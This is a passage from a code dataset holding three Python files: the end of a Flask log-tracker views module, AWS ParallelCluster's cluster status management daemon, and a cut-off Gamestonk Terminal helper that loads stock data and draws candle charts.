note=note,\r\n tid=tid, uid=current_user.id, added_date_time=now)\r\n db.session.add(log_info)\r\n db.session.commit()\r\n flash('New Log Added For ' + tracker.name +\r\n ' Tracker', category='success')\r\n return redirect(url_for('views.trinfo', tid=tid))\r\n\r\n\r\n@views.route('/edit-log/', methods=['GET', 'POST'])\r\n@login_required\r\ndef edit_log(lid):\r\n from .models import Log, Tracker\r\n from . import db\r\n options = []\r\n from . import db\r\n logs = Log.query.get(lid)\r\n all_logs = Log.query.filter(Log.tid == logs.tid).all()\r\n tracker = Tracker.query.get(logs.tid)\r\n user = current_user.id\r\n \r\n if tracker.type == \"multiple_choice\":\r\n option = tracker.settings\r\n options = option.split(',')\r\n\r\n if request.method == 'POST':\r\n when = request.form.get('date')\r\n value = request.form.get('value')\r\n note = request.form.get('note')\r\n\r\n\r\n logs.timestamp = when\r\n logs.value = value\r\n logs.note = note\r\n\r\n db.session.commit()\r\n\r\n return redirect(url_for('views.trinfo', tid=logs.tid))\r\n return render_template(\"editlog.html\", user=current_user, tracker=tracker, log=logs, tid=logs.tid, all_logs=all_logs, options=options)\r\n\r\n\r\n@views.route('/delete-log/', methods=['GET', 'POST'])\r\n@login_required\r\ndef delete_log(lid):\r\n from .models import Log\r\n loginfo = Log.query.get(lid)\r\n tid = loginfo.tid\r\n from . import db\r\n db.session.delete(loginfo)\r\n db.session.commit()\r\n return redirect(url_for('views.trinfo', tid=tid))\r\n","repo_name":"somyadipayan/QuantifiedSelf","sub_path":"webapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71038934975","text":"import functools\nimport json\nimport logging\nimport os\nimport shlex\n\n# A nosec comment is appended to the following line in order to disable the B404 check.\n# In this file the input of the module subprocess is trusted.\nimport subprocess # nosec B404\nimport time\nfrom configparser import ConfigParser\nfrom datetime import datetime, timezone\nfrom enum import Enum\nfrom logging.config import fileConfig\n\nimport boto3\nfrom boto3.dynamodb.conditions import Attr\nfrom botocore.config import Config\n\nCONFIG_FILE_DIR = \"/etc/parallelcluster\"\nLOOP_TIME = 60\nlog = logging.getLogger(__name__)\n\n\n# Utils\ndef _seconds(sec):\n \"\"\"Convert seconds to milliseconds.\"\"\"\n return sec * 1000\n\n\ndef _minutes(min):\n \"\"\"Convert minutes to seconds.\"\"\"\n return min * 60\n\n\ndef _sleep_remaining_loop_time(total_loop_time, loop_start_time=None):\n end_time = datetime.now(tz=timezone.utc)\n if not loop_start_time:\n loop_start_time = end_time\n # Always convert the received loop_start_time to utc timezone. This is so that we never rely on the system local\n # time and risk to compare native datatime instances with localized ones\n loop_start_time = loop_start_time.astimezone(tz=timezone.utc)\n time_delta = (end_time - loop_start_time).total_seconds()\n if 0 <= time_delta < total_loop_time:\n time.sleep(total_loop_time - time_delta)\n\n\ndef log_exception(\n logger,\n action_desc,\n log_level=logging.ERROR,\n catch_exception=Exception,\n raise_on_error=True,\n exception_to_raise=None,\n):\n def decorator_log_exception(function):\n @functools.wraps(function)\n def wrapper_log_exception(*args, **kwargs): # pylint: disable=R1710\n try:\n return function(*args, **kwargs)\n except catch_exception as e:\n logger.log(log_level, \"Failed when %s with exception %s\", action_desc, e)\n if raise_on_error:\n if exception_to_raise:\n raise exception_to_raise\n raise\n return None\n\n return wrapper_log_exception\n\n return decorator_log_exception\n\n\ndef _run_command( # noqa: C901\n command,\n capture_output=False,\n log_error=True,\n env=None,\n timeout=None,\n raise_on_error=True,\n):\n \"\"\"Execute shell command.\"\"\"\n if isinstance(command, str):\n command = shlex.split(command)\n log_command = command if isinstance(command, str) else \" \".join(str(arg) for arg in command)\n log.info(\"Executing command: %s\", log_command)\n try:\n result = subprocess.run( # nosec - trusted input\n command,\n capture_output=capture_output,\n universal_newlines=True,\n encoding=\"utf-8\",\n env=env,\n timeout=timeout,\n check=False,\n )\n result.check_returncode()\n except subprocess.CalledProcessError:\n if log_error:\n log.error(\n \"Command %s failed\",\n log_command,\n )\n if raise_on_error:\n raise\n except subprocess.TimeoutExpired:\n if log_error:\n log.error(\"Command %s timed out after %s sec\", log_command, timeout)\n if raise_on_error:\n raise\n\n return result\n\n\ndef _write_json_to_file(filename, json_data):\n \"\"\"Write json to file.\"\"\"\n with open(filename, \"w\", encoding=\"utf-8\") as file:\n file.write(json.dumps(json_data))\n\n\nclass ComputeFleetStatus(Enum):\n \"\"\"Represents the status of the cluster compute fleet.\"\"\"\n\n STOPPED = \"STOPPED\" # Fleet is stopped, partitions are inactive.\n RUNNING = \"RUNNING\" # Fleet is running, partitions are active.\n STOPPING = \"STOPPING\" # clusterstatusmgtd is handling the stop request.\n STARTING = \"STARTING\" # clusterstatusmgtd is handling the start request.\n STOP_REQUESTED = \"STOP_REQUESTED\" # A request to stop the fleet has been submitted.\n START_REQUESTED = \"START_REQUESTED\" # A request to start the fleet has been submitted.\n # PROTECTED indicates that some partitions have consistent bootstrap failures. Affected partitions are inactive.\n PROTECTED = \"PROTECTED\"\n\n # cluster compute fleet mapping for status exposed to the update event handler\n EVENT_HANDLER_STATUS_MAPPING = {STOPPING: STOP_REQUESTED, STARTING: START_REQUESTED}\n UNKNOWN = \"UNKNOWN\"\n\n def __str__(self): # noqa: D105\n return str(self.value)\n\n @staticmethod\n def _transform_compute_fleet_data(compute_fleet_data):\n try:\n compute_fleet_data[\n ComputeFleetStatusManager.COMPUTE_FLEET_STATUS_ATTRIBUTE\n ] = ComputeFleetStatus.EVENT_HANDLER_STATUS_MAPPING.value.get(\n compute_fleet_data.get(ComputeFleetStatusManager.COMPUTE_FLEET_STATUS_ATTRIBUTE),\n str(ComputeFleetStatus.UNKNOWN),\n )\n return compute_fleet_data\n except AttributeError as e:\n raise Exception(f\"Unable to parse compute fleet status data: {e}\")\n\n @staticmethod\n def is_start_in_progress(status): # noqa: D102\n return status in {ComputeFleetStatus.START_REQUESTED, ComputeFleetStatus.STARTING}\n\n @staticmethod\n def is_stop_in_progress(status): # noqa: D102\n return status in {ComputeFleetStatus.STOP_REQUESTED, ComputeFleetStatus.STOPPING}\n\n @staticmethod\n def is_protected_status(status): # noqa: D102\n return status == ComputeFleetStatus.PROTECTED\n\n\nclass ComputeFleetStatusManager:\n \"\"\"\n Manages the compute fleet status store into the DynamoDB table.\n\n The value stored in the table is a json in the following form\n {\n \"status\": \"STOPPING\",\n \"lastStatusUpdatedTime\": \"2021-12-21 18:12:07.485674+00:00\",\n \"queues\": {\n \"queue_name1\": {\n \"status\": \"RUNNING\",\n \"lastStatusUpdatedTime\": \"2021-12-21 18:10:02.485674+00:00\",\n }\n }\n }\n \"\"\"\n\n DB_KEY = \"COMPUTE_FLEET\"\n DB_DATA = \"Data\"\n\n COMPUTE_FLEET_STATUS_ATTRIBUTE = \"status\"\n COMPUTE_FLEET_LAST_UPDATED_TIME_ATTRIBUTE = \"lastStatusUpdatedTime\"\n\n QUEUES_ATTRIBUTE = \"queues\"\n QUEUE_STATUS_ATTRIBUTE = \"status\"\n QUEUE_LAST_UPDATED_TIME_ATTRIBUTE = \"lastStatusUpdatedTime\"\n\n class ConditionalStatusUpdateFailedError(Exception):\n \"\"\"Raised when there is a failure in updating the status due to a change occurred after retrieving its value.\"\"\"\n\n pass\n\n class FleetDataNotFoundError(Exception):\n \"\"\"Raised when compute fleet data cannot be found in db table.\"\"\"\n\n pass\n\n def __init__(self, table_name, boto3_config, region):\n self._ddb_resource = boto3.resource(\"dynamodb\", region_name=region, config=boto3_config)\n self._table = self._ddb_resource.Table(table_name)\n\n def get_status(self): # noqa: D102\n compute_fleet_item = self._table.get_item(\n ConsistentRead=True,\n Key={\"Id\": self.DB_KEY},\n )\n if not compute_fleet_item or \"Item\" not in compute_fleet_item:\n raise ComputeFleetStatusManager.FleetDataNotFoundError(\"COMPUTE_FLEET data not found in db table\")\n\n log.debug(\"Found COMPUTE_FLEET data (%s)\", compute_fleet_item)\n return compute_fleet_item[\"Item\"].get(self.DB_DATA)\n\n def update_status(self, current_status, next_status): # noqa: D102\n try:\n updated_attributes = self._table.update_item(\n Key={\"Id\": self.DB_KEY},\n UpdateExpression=\"set #dt.#st=:s, #dt.#lut=:t\",\n ExpressionAttributeNames={\n \"#dt\": self.DB_DATA,\n \"#st\": self.COMPUTE_FLEET_STATUS_ATTRIBUTE,\n \"#lut\": self.COMPUTE_FLEET_LAST_UPDATED_TIME_ATTRIBUTE,\n },\n ExpressionAttributeValues={\n \":s\": str(next_status),\n \":t\": str(datetime.now(tz=timezone.utc)),\n },\n ConditionExpression=Attr(f\"{self.DB_DATA}.{self.COMPUTE_FLEET_STATUS_ATTRIBUTE}\").eq(\n str(current_status)\n ),\n ReturnValues=\"ALL_NEW\",\n )\n\n return updated_attributes.get(\"Attributes\").get(f\"{self.DB_DATA}\")\n except self._ddb_resource.meta.client.exceptions.ConditionalCheckFailedException as e:\n raise ComputeFleetStatusManager.ConditionalStatusUpdateFailedError(e)\n\n\nclass ClusterstatusmgtdConfig:\n \"\"\"Represents the cluster status management demon configuration.\"\"\"\n\n DEFAULTS = {\n \"max_retry\": 5,\n \"loop_time\": LOOP_TIME,\n \"proxy\": \"NONE\",\n \"logging_config\": os.path.join(os.path.dirname(__file__), \"clusterstatusmgtd_logging.conf\"),\n \"update_event_timeout_minutes\": 15,\n }\n\n def __init__(self, config_file_path):\n self._get_config(config_file_path)\n\n def __repr__(self): # noqa: D105\n attrs = \", \".join([f\"{key}={repr(value)}\" for key, value in self.__dict__.items()])\n return f\"{self.__class__.__name__}({attrs})\"\n\n def __eq__(self, other): # noqa: D105\n if type(other) is type(self):\n return self._config == other._config\n return False\n\n def __ne__(self, other): # noqa: D105\n return not self.__eq__(other)\n\n @log_exception(\n log, \"reading cluster status manger configuration file\", catch_exception=IOError, raise_on_error=True\n )\n def _get_config(self, config_file_path):\n \"\"\"Get clusterstatusmgtd configuration.\"\"\"\n log.info(\"Reading %s\", config_file_path)\n self._config = ConfigParser()\n with open(config_file_path, \"r\", encoding=\"utf-8\") as config_file:\n self._config.read_file(config_file)\n\n # Get config settings\n self._get_basic_config(self._config)\n\n def _get_basic_config(self, config):\n \"\"\"Get basic config options.\"\"\"\n self.region = config.get(\"clusterstatusmgtd\", \"region\")\n self.cluster_name = config.get(\"clusterstatusmgtd\", \"cluster_name\")\n self.dynamodb_table = config.get(\"clusterstatusmgtd\", \"dynamodb_table\")\n self.computefleet_status_path = config.get(\"clusterstatusmgtd\", \"computefleet_status_path\")\n self.logging_config = config.get(\n \"clusterstatusmgtd\", \"logging_config\", fallback=self.DEFAULTS.get(\"logging_config\")\n )\n self.loop_time = config.getint(\"clusterstatusmgtd\", \"loop_time\", fallback=self.DEFAULTS.get(\"loop_time\"))\n self.update_event_timeout_minutes = config.getint(\n \"clusterstatusmgtd\",\n \"update_event_timeout_minutes\",\n fallback=self.DEFAULTS.get(\"update_event_timeout_minutes\"),\n )\n\n # Configure boto3 to retry 1 times by default\n self._boto3_retry = config.getint(\"clusterstatusmgtd\", \"boto3_retry\", fallback=self.DEFAULTS.get(\"max_retry\"))\n self._boto3_config = {\"retries\": {\"max_attempts\": self._boto3_retry, \"mode\": \"standard\"}}\n # Configure proxy\n proxy = config.get(\"clusterstatusmgtd\", \"proxy\", fallback=self.DEFAULTS.get(\"proxy\"))\n if proxy != \"NONE\":\n self._boto3_config[\"proxies\"] = {\"https\": proxy}\n self.boto3_config = Config(**self._boto3_config)\n\n\nclass ClusterStatusManager:\n \"\"\"The cluster status manager.\"\"\"\n\n def __init__(self, config):\n \"\"\"Initialize ClusterStatusManager.\"\"\"\n self._config = None\n self._current_time = None\n self._compute_fleet_status_manager = None\n self._compute_fleet_status = ComputeFleetStatus.RUNNING\n self._compute_fleet_data = {}\n self.set_config(config)\n\n class ClusterStatusUpdateEventError(Exception):\n \"\"\"Raised when there is a failure in updating the status due to an error on update event handler execution.\"\"\"\n\n pass\n\n def set_config(self, config): # noqa: D102\n if self._config != config:\n log.info(\"Applying new clusterstatusmgtd config: %s\", config)\n self._config = config\n self._compute_fleet_status_manager = self._initialize_compute_fleet_status_manager(config)\n\n @staticmethod\n def _initialize_compute_fleet_status_manager(config):\n return ComputeFleetStatusManager(\n table_name=config.dynamodb_table, boto3_config=config.boto3_config, region=config.region\n )\n\n def _get_compute_fleet_status(self, fallback=None):\n try:\n log.info(\"Getting compute fleet status\")\n self._compute_fleet_data = self._compute_fleet_status_manager.get_status()\n\n return ComputeFleetStatus(\n self._compute_fleet_data.get(self._compute_fleet_status_manager.COMPUTE_FLEET_STATUS_ATTRIBUTE)\n )\n except Exception as e:\n log.error(\n \"Failed when retrieving computefleet status from DynamoDB with error %s, using fallback value %s\",\n e,\n fallback,\n )\n return fallback\n\n def _update_compute_fleet_status(self, new_status):\n log.info(\"Updating compute fleet status from %s to %s\", self._compute_fleet_status, new_status)\n self._compute_fleet_data = self._compute_fleet_status_manager.update_status(\n current_status=self._compute_fleet_status, next_status=new_status\n )\n self._compute_fleet_status = new_status\n\n def _call_update_event(self):\n try:\n compute_fleet_data = ComputeFleetStatus._transform_compute_fleet_data( # pylint: disable=W0212\n self._compute_fleet_data\n )\n _write_json_to_file(self._config.computefleet_status_path, compute_fleet_data)\n except Exception as e:\n log.error(\"Update event handler failed during fleet status translation: %s\", e)\n raise ClusterStatusManager.ClusterStatusUpdateEventError(e)\n\n cinc_log_file = \"/var/log/chef-client.log\"\n log.info(\"Calling update event handler, log can be found at %s\", cinc_log_file)\n cmd = (\n \"sudo cinc-client \"\n \"--local-mode \"\n \"--config /etc/chef/client.rb \"\n \"--log_level auto \"\n f\"--logfile {cinc_log_file} \"\n \"--force-formatter \"\n \"--no-color \"\n \"--chef-zero-port 8889 \"\n \"--json-attributes /etc/chef/dna.json \"\n \"--override-runlist aws-parallelcluster-entrypoints::update_computefleet_status\"\n )\n try:\n # The command being passed has been built from string literals and local variables and can be trusted.\n _run_command(cmd, self._config.update_event_timeout_minutes)\n except Exception as e:\n log.error(\"Update event handler failed. Check log file %s\", cinc_log_file)\n raise ClusterStatusManager.ClusterStatusUpdateEventError(e)\n\n def _update_status(self, request_status, in_progress_status, final_status):\n if self._compute_fleet_status == request_status:\n self._update_compute_fleet_status(in_progress_status)\n\n self._call_update_event()\n if self._compute_fleet_status == in_progress_status:\n self._update_compute_fleet_status(final_status)\n\n @log_exception(log, \"handling compute fleet status transitions\", catch_exception=Exception, raise_on_error=False)\n def manage_cluster_status(self):\n \"\"\"\n Manage cluster status.\n\n When running pcluster start/stop command the fleet status is set to START_REQUESTED/STOP_REQUESTED.\n The function fetches the current fleet status and performs the following transitions:\n - START_REQUESTED -> STARTING -> RUNNING\n - STOP_REQUESTED -> STOPPING -> STOPPED\n STARTING/STOPPING states are only used to communicate that the request is being processed by clusterstatusmgtd.\n On status STARTING|STOPPING, the update event handler baked by the recipe\n aws-parallelcluster-entrypoints::update_computefleet_status is called\n \"\"\"\n self._current_time = datetime.now(tz=timezone.utc)\n self._compute_fleet_status = self._get_compute_fleet_status(fallback=self._compute_fleet_status)\n log.info(\"Current compute fleet status: %s\", self._compute_fleet_status)\n try:\n if ComputeFleetStatus.is_stop_in_progress(self._compute_fleet_status):\n self._update_status(\n ComputeFleetStatus.STOP_REQUESTED, ComputeFleetStatus.STOPPING, ComputeFleetStatus.STOPPED\n )\n elif ComputeFleetStatus.is_start_in_progress(self._compute_fleet_status):\n self._update_status(\n ComputeFleetStatus.START_REQUESTED, ComputeFleetStatus.STARTING, ComputeFleetStatus.RUNNING\n )\n except ComputeFleetStatusManager.ConditionalStatusUpdateFailedError:\n log.warning(\n \"Cluster status was updated while handling a transition from %s. \"\n \"Status transition will be retried at the next iteration\",\n self._compute_fleet_status,\n )\n\n\ndef _run_clusterstatusmgtd(config_file):\n config = ClusterstatusmgtdConfig(config_file)\n cluster_status_manager = ClusterStatusManager(config=config)\n while True:\n # Get loop start time\n start_time = datetime.now(tz=timezone.utc)\n # Get program config\n try:\n config = ClusterstatusmgtdConfig(config_file)\n cluster_status_manager.set_config(config)\n except Exception as e:\n log.warning(\"Unable to reload daemon config from %s, using previous one.\\nException: %s\", config_file, e)\n # Configure root logger\n try:\n fileConfig(config.logging_config, disable_existing_loggers=False)\n except Exception as e:\n log.warning(\n \"Unable to configure logging from %s, using default logging settings.\\nException: %s\",\n config.logging_config,\n e,\n )\n # Manage cluster\n cluster_status_manager.manage_cluster_status()\n _sleep_remaining_loop_time(config.loop_time, start_time)\n\n\ndef retry(delay):\n def decorator_retry(func):\n @functools.wraps(func)\n def wrapper_retry(*args, **kwargs):\n while True:\n try:\n return func(*args, **kwargs)\n except Exception:\n time.sleep(delay)\n\n return wrapper_retry\n\n return decorator_retry\n\n\n@retry(LOOP_TIME)\ndef main():\n logging.basicConfig(\n level=logging.INFO, format=\"%(asctime)s - [%(module)s:%(funcName)s] - %(levelname)s - %(message)s\"\n )\n log.info(\"Clusterstatusmgtd Startup\")\n try:\n clusterstatusmgtd_config_file = os.environ.get(\n \"CONFIG_FILE\", os.path.join(CONFIG_FILE_DIR, \"clusterstatusmgtd.conf\")\n )\n _run_clusterstatusmgtd(clusterstatusmgtd_config_file)\n except Exception as e:\n log.exception(\"An unexpected error occurred: %s.\\nRestarting in %s seconds...\", e, LOOP_TIME)\n raise\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"aws/aws-parallelcluster-cookbook","sub_path":"cookbooks/aws-parallelcluster-computefleet/files/clusterstatusmgtd/clusterstatusmgtd.py","file_name":"clusterstatusmgtd.py","file_ext":"py","file_size_in_byte":19024,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"79"} +{"seq_id":"6532096882","text":"\"\"\"Main helper\"\"\"\n__docformat__ = \"numpy\"\nimport argparse\nimport json\nfrom datetime import datetime, timedelta\nfrom typing import List, Union\n\nimport matplotlib.pyplot as plt\nimport mplfinance as mpf\nimport pandas as pd\nimport plotly.graph_objects as go\nimport pyEX\nimport pytz\nimport requests\nimport yfinance as yf\nfrom alpha_vantage.timeseries import TimeSeries\nfrom numpy.core.fromnumeric import transpose\nfrom plotly.subplots import make_subplots\nfrom scipy import stats\nfrom tabulate import tabulate\n\nfrom gamestonk_terminal import config_terminal as cfg\nfrom gamestonk_terminal import feature_flags as gtff\nfrom gamestonk_terminal.helper_funcs import (\n parse_known_args_and_warn,\n plot_autoscale,\n try_except,\n)\n\n# pylint: disable=no-member,too-many-branches,C0302\n\nINTERVALS = [1, 5, 15, 30, 60]\nSOURCES = [\"yf\", \"av\", \"iex\"]\n\n\n@try_except\ndef search(\n query: str,\n amount: int,\n):\n \"\"\"Search selected query for tickers.\n\n Parameters\n ----------\n query : str\n The search term used to find company tickers.\n amount : int\n The amount of companies shown.\n\n Returns\n -------\n tabulate\n Companies that match the query.\n \"\"\"\n equities_list = (\n \"https://raw.githubusercontent.com/JerBouma/FinanceDatabase/master/\"\n \"Database/Equities/Equities List.json\"\n )\n request = requests.get(equities_list)\n equities = json.loads(request.text)\n\n equities_query = {\n key: value\n for key, value in equities.items()\n if (query in key.lower()) or (query in value.lower())\n }\n\n equities_dataframe = pd.DataFrame(\n equities_query.items(),\n index=equities_query.values(),\n columns=[\"Company\", \"Ticker\"],\n )\n\n if equities_dataframe.empty:\n raise ValueError(\"No companies found. \\n\")\n\n if gtff.USE_TABULATE_DF:\n print(\n tabulate(\n equities_dataframe.iloc[:amount],\n showindex=False,\n headers=[\"Company\", \"Ticker\"],\n tablefmt=\"fancy_grid\",\n ),\n \"\\n\",\n )\n else:\n print(equities_dataframe.iloc[:amount].to_string(), \"\\n\")\n\n\n@try_except\ndef load(\n ticker: str,\n start: datetime = (datetime.now() - timedelta(days=366)),\n interval: int = 1440,\n end: datetime = datetime.now(),\n prepost: bool = False,\n source: str = \"yf\",\n iexrange: str = \"ytd\",\n):\n \"\"\"\n Load a symbol to perform analysis using the string above as a template. Optional arguments and their\n descriptions are listed above. The default source is, yFinance (https://pypi.org/project/yfinance/).\n Alternatively, one may select either AlphaVantage (https://www.alphavantage.co/documentation/)\n or IEX Cloud (https://iexcloud.io/docs/api/) as the data source for the analysis.\n Please note that certain analytical features are exclusive to the source.\n\n To load a symbol from an exchange outside of the NYSE/NASDAQ default, use yFinance as the source and\n add the corresponding exchange to the end of the symbol. i.e. ‘BNS.TO’.\n\n BNS is a dual-listed stock, there are separate options chains and order books for each listing.\n Opportunities for arbitrage may arise from momentary pricing discrepancies between listings\n with a dynamic exchange rate as a second order opportunity in ForEx spreads.\n\n Find the full list of supported exchanges here:\n https://help.yahoo.com/kb/exchanges-data-providers-yahoo-finance-sln2310.html\n\n Certain analytical features, such as VWAP, require the ticker to be loaded as intraday\n using the ‘-i x’ argument. When encountering this error, simply reload the symbol using\n the interval argument. i.e. ‘load -t BNS -s YYYY-MM-DD -i 1 -p’ loads one-minute intervals,\n including Pre/After Market data, using the default source, yFinance.\n\n Certain features, such as the Prediction menu, require the symbol to be loaded as daily and not intraday.\n\n Parameters\n ----------\n ticker: str\n Ticker to get data\n start: datetime\n Start date to get data from with\n interval: int\n Interval (in minutes) to get data 1, 5, 15, 30, 60 or 1440\n end: datetime\n End date to get data from with\n prepost: bool\n Pre and After hours data\n source: str\n Source of data extracted\n iexrange: str\n Timeframe to get IEX data.\n\n Returns\n -------\n df_stock_candidate: pd.DataFrame\n Dataframe of data\n \"\"\"\n\n # Daily\n if interval == 1440:\n\n # Alpha Vantage Source\n if source == \"av\":\n ts = TimeSeries(key=cfg.API_KEY_ALPHAVANTAGE, output_format=\"pandas\")\n # pylint: disable=unbalanced-tuple-unpacking\n df_stock_candidate, _ = ts.get_daily_adjusted(\n symbol=ticker, outputsize=\"full\"\n )\n\n df_stock_candidate.columns = [\n val.split(\". \")[1].capitalize() for val in df_stock_candidate.columns\n ]\n\n df_stock_candidate = df_stock_candidate.rename(\n columns={\n \"Adjusted close\": \"Adj Close\",\n }\n )\n\n # Check that loading a stock was not successful\n # pylint: disable=no-member\n if df_stock_candidate.empty:\n return pd.DataFrame()\n\n df_stock_candidate.index = df_stock_candidate.index.tz_localize(None)\n\n # pylint: disable=no-member\n df_stock_candidate.sort_index(ascending=True, inplace=True)\n\n # Slice dataframe from the starting date YYYY-MM-DD selected\n df_stock_candidate = df_stock_candidate[\n (df_stock_candidate.index >= start.strftime(\"%Y-%m-%d\"))\n & (df_stock_candidate.index <= end.strftime(\"%Y-%m-%d\"))\n ]\n\n # Yahoo Finance Source\n elif source == \"yf\":\n df_stock_candidate = yf.download(\n ticker,\n start=start,\n end=end,\n progress=False,\n )\n\n # Check that loading a stock was not successful\n if df_stock_candidate.empty:\n return pd.DataFrame()\n\n df_stock_candidate.index.name = \"date\"\n\n # IEX Cloud Source\n elif source == \"iex\":\n client = pyEX.Client(api_token=cfg.API_IEX_TOKEN, version=\"v1\")\n\n df_stock_candidate = client.chartDF(ticker, timeframe=iexrange)\n\n # Check that loading a stock was not successful\n if df_stock_candidate.empty:\n return pd.DataFrame()\n\n df_stock_candidate = df_stock_candidate[\n [\"close\", \"fHigh\", \"fLow\", \"fOpen\", \"fClose\", \"volume\"]\n ]\n df_stock_candidate = df_stock_candidate.rename(\n columns={\n \"close\": \"Close\",\n \"fHigh\": \"High\",\n \"fLow\": \"Low\",\n \"fOpen\": \"Open\",\n \"fClose\": \"Adj Close\",\n \"volume\": \"Volume\",\n }\n )\n\n df_stock_candidate.sort_index(ascending=True, inplace=True)\n s_start = df_stock_candidate.index[0]\n s_interval = f\"{interval}min\"\n\n else:\n\n s_int = str(interval) + \"m\"\n s_interval = s_int + \"in\"\n d_granularity = {\"1m\": 6, \"5m\": 59, \"15m\": 59, \"30m\": 59, \"60m\": 729}\n\n s_start_dt = datetime.utcnow() - timedelta(days=d_granularity[s_int])\n s_date_start = s_start_dt.strftime(\"%Y-%m-%d\")\n\n df_stock_candidate = yf.download(\n ticker,\n start=s_date_start if s_start_dt > start else start.strftime(\"%Y-%m-%d\"),\n progress=False,\n interval=s_int,\n prepost=prepost,\n )\n\n # Check that loading a stock was not successful\n if df_stock_candidate.empty:\n return pd.DataFrame()\n\n df_stock_candidate.index = df_stock_candidate.index.tz_localize(None)\n\n if s_start_dt > start:\n s_start = pytz.utc.localize(s_start_dt)\n else:\n s_start = start\n\n df_stock_candidate.index.name = \"date\"\n\n s_intraday = (f\"Intraday {s_interval}\", \"Daily\")[interval == 1440]\n\n print(\n f\"Loading {s_intraday} {ticker.upper()} stock \"\n f\"with starting period {s_start.strftime('%Y-%m-%d')} for analysis.\\n\"\n )\n\n return df_stock_candidate\n\n\ndef display_candle(\n s_ticker: str, df_stock: pd.DataFrame, use_matplotlib: bool, intraday: bool = False\n):\n \"\"\"Shows candle plot of loaded ticker. [Source: Yahoo Finance, IEX Cloud or Alpha Vantage]\n\n Parameters\n ----------\n df_stock: pd.DataFrame\n Stock dataframe\n s_ticker: str\n Ticker name\n use_matplotlib: bool\n Flag to use matplotlib instead of interactive plotly chart\n intraday: bool\n Flag for intraday data for plotly range breaks\n \"\"\"\n if (df_stock.index[1] - df_stock.index[0]).total_seconds() >= 86400:\n df_stock = find_trendline(df_stock, \"OC_High\", \"high\")\n df_stock = find_trendline(df_stock, \"OC_Low\", \"low\")\n\n if use_matplotlib:\n mc = mpf.make_marketcolors(\n up=\"green\",\n down=\"red\",\n edge=\"black\",\n wick=\"black\",\n volume=\"in\",\n ohlc=\"i\",\n )\n\n s = mpf.make_mpf_style(marketcolors=mc, gridstyle=\":\", y_on_right=True)\n\n ap0 = []\n\n if \"OC_High_trend\" in df_stock.columns:\n ap0.append(\n mpf.make_addplot(df_stock[\"OC_High_trend\"], color=\"g\"),\n )\n\n if \"OC_Low_trend\" in df_stock.columns:\n ap0.append(\n mpf.make_addplot(df_stock[\"OC_Low_trend\"], color=\"b\"),\n )\n\n if gtff.USE_ION:\n plt.ion()\n\n mpf.plot(\n df_stock,\n type=\"candle\",\n mav=(20, 50),\n volume=True,\n title=f\"\\nStock {s_ticker}\",\n addplot=ap0,\n xrotation=10,\n style=s,\n figratio=(10, 7),\n figscale=1.10,\n figsize=(plot_autoscale()),\n update_width_config=dict(\n candle_linewidth=1.0, candle_width=0.8, volume_linewidth=1.0\n ),\n )\n else:\n fig = make_subplots(\n rows=2,\n cols=1,\n shared_xaxes=True,\n vertical_spacing=0.06,\n subplot_titles=(f\"{s_ticker}\", \"Volume\"),\n row_width=[0.2, 0.7],\n )\n fig.add_trace(\n go.Candlestick(\n x=df_stock.index,\n open=df_stock.Open,\n high=df_stock.High,\n low=df_stock.Low,\n close=df_stock.Close,\n name=\"OHLC\",\n ),\n row=1,\n col=1,\n )\n fig.add_trace(\n go.Scatter(\n x=df_stock.index,\n y=df_stock[\"ma20\"],\n name=\"MA20\",\n mode=\"lines\",\n line=go.scatter.Line(color=\"royalblue\"),\n ),\n row=1,\n col=1,\n )\n fig.add_trace(\n go.Scatter(\n x=df_stock.index,\n y=df_stock[\"ma50\"],\n name=\"MA50\",\n mode=\"lines\",\n line=go.scatter.Line(color=\"black\"),\n ),\n row=1,\n col=1,\n )\n\n if \"OC_High_trend\" in df_stock.columns:\n fig.add_trace(\n go.Scatter(\n x=df_stock.index,\n y=df_stock[\"OC_High_trend\"],\n name=\"High Trend\",\n mode=\"lines\",\n line=go.scatter.Line(color=\"green\"),\n ),\n row=1,\n col=1,\n )\n if \"OC_Low_trend\" in df_stock.columns:\n fig.add_trace(\n go.Scatter(\n x=df_stock.index,\n y=df_stock[\"OC_Low_trend\"],\n name=\"Low Trend\",\n mode=\"lines\",\n line=go.scatter.Line(color=\"red\"),\n ),\n row=1,\n col=1,\n )\n\n fig.add_trace(\n go.Bar(\n x=df_stock.index,\n y=df_stock.Volume,\n name=\"Volume\",\n marker_color=\"#696969\",\n ),\n row=2,\n col=1,\n )\n fig.update_layout(\n yaxis_title=\"Stock Price ($)\",\n xaxis=dict(\n rangeselector=dict(\n buttons=list(\n [\n dict(\n count=1,\n label=\"1m\",\n step=\"month\",\n stepmode=\"backward\",\n ),\n dict(\n count=3,\n label=\"3m\",\n step=\"month\",\n stepmode=\"backward\",\n ),\n dict(count=1, label=\"YTD\", step=\"year\", stepmode=\"todate\"),\n dict(\n count=1,\n label=\"1y\",\n step=\"year\",\n stepmode=\"backward\",\n ),\n dict(step=\"all\"),\n ]\n )\n ),\n rangeslider=dict(visible=False),\n type=\"date\",\n ),\n )\n if intraday:\n fig.update_xaxes(\n rangebreaks=[\n dict(bounds=[\"sat\", \"mon\"]),\n dict(bounds=[16, 9.5], pattern=\"hour\"),\n ]\n )\n\n fig.show()\n print(\"\")\n\n\ndef quote(other_args: List[str], s_ticker: str):\n \"\"\"Ticker quote\n\n Parameters\n ----------\n other_args : List[str]\n Argparse arguments\n s_ticker : str\n Ticker\n \"\"\"\n parser = argparse.ArgumentParser(\n add_help=False,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n prog=\"quote\",\n description=\"Current quote for stock ticker\",\n )\n\n if s_ticker:\n parser.add_argument(\n \"-t\",\n \"--ticker\",\n action=\"store\",\n dest=\"s_ticker\",\n default=s_ticker,\n help=\"Stock ticker\",\n )\n else:\n parser.add_argument(\n \"-t\",\n \"--ticker\",\n action=\"store\",\n dest=\"s_ticker\",\n required=True,\n help=\"Stock ticker\",\n )\n\n # Price only option.\n parser.add_argument(\n \"-p\",\n \"--price\",\n action=\"store_true\",\n dest=\"price_only\",\n default=False,\n help=\"Price only\",\n )\n\n try:\n # For the case where a user uses: 'quote BB'\n if other_args and \"-\" not in other_args[0][0]:\n other_args.insert(0, \"-t\")\n ns_parser = parse_known_args_and_warn(parser, other_args)\n if not ns_parser:\n return\n\n except SystemExit:\n print(\"\")\n return\n\n 